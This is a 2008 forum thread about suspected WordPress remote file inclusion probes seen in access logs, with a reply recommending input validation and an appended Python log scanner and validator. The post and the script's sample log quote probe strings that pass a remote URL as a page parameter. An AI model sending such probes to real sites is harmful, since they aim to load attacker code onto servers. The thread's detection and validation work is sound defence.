Wordpress Vulnerability?
Lately I’ve been noticing strange folders popping up on my server that I didn’t create. First, there was a folder called "www.asolutionsts.com" and it didn’t contain anything but another folder called "sugarcrm" and inside that another called "id4.txt?" I deleted that one and hoped that was the end of it.
Now there’s a new one called "www.emabe.com" with similar empty folders inside of it. This is getting troublesome.
I’m only blaming Wordpress because I’ve checked my access logs and these folders are being created by adding an additional query string to the end of the URL. e.g:
?pag=http://www.asolutionsts.com/sugarcrm/id4.txt?
or
?main=http://www.emabe.com/administrator/...
If you do a search for either of those domains, you’ll see that they are popping up in a lot of access logs.
I’m not sure where this bug is or how it works. It definitely affects the latest version (2.3.2). Maybe I’ll dig around the code and see if I can find anything. All I can suggest is to keep an eye on your servers if you use Wordpress.
Original post by nerdcore
posted on: February 3rd, 2008 at 1:22 pm
I’ve seen that pop up on my servers too - in those cases a bit of sanitation goes a long way. I’ve found even something easy like the PHP command is_numeric goes a long way for stopping that kind of stuff. It’s aggravating.
posted on: February 3rd, 2008 at 11:34 am
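As an added example (not code from either poster), this script does the two things the thread talks about: it scans access-log lines for the pattern nerdcore saw, a query parameter whose value is itself a URL, and it shows the kind of strict input validation the reply has in mind with is_numeric. The log lines are constructed for this example; only the query strings are taken from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines for this example; the two
# suspicious query strings are the ones quoted in the original post.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Feb/2008:10:02:11 -0500] "GET /index.php?pag=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [03/Feb/2008:10:05:40 -0500] "GET /index.php?main=http://www.emabe.com/administrator/ HTTP/1.1" 200 498 "-" "Mozilla/4.0"
192.0.2.77 - - [03/Feb/2008:10:07:02 -0500] "GET /index.php?pag=12 HTTP/1.1" 200 7734 "-" "Mozilla/5.0"
192.0.2.78 - - [03/Feb/2008:10:08:15 -0500] "GET /about/ HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
"""

# Minimal parser for the fields we need: client IP, timestamp, request path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
# A parameter value that starts with a scheme or "//" points off-site.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://|^//', re.IGNORECASE)


def find_remote_include_probes(log_text):
    """Return (ip, param, value) for every request whose query parameter
    value is itself a URL, the pattern the original post found in its logs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('path')).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.search(value):
                hits.append((m.group('ip'), name, value))
    return hits


def safe_page_id(raw, allowed=frozenset({'home', 'about', 'contact'})):
    """Validation in the spirit of the reply's is_numeric advice: accept a page
    id only if it is a non-negative integer or an allowlisted name (the names
    here are assumed for the example). Anything else, including a URL, is
    rejected so it can never reach a file include."""
    if raw.isdigit():
        return int(raw)
    if raw in allowed:
        return raw
    return None


if __name__ == '__main__':
    for ip, name, value in find_remote_include_probes(SAMPLE_LOG):
        print(f'{ip} sent {name}={value}')
```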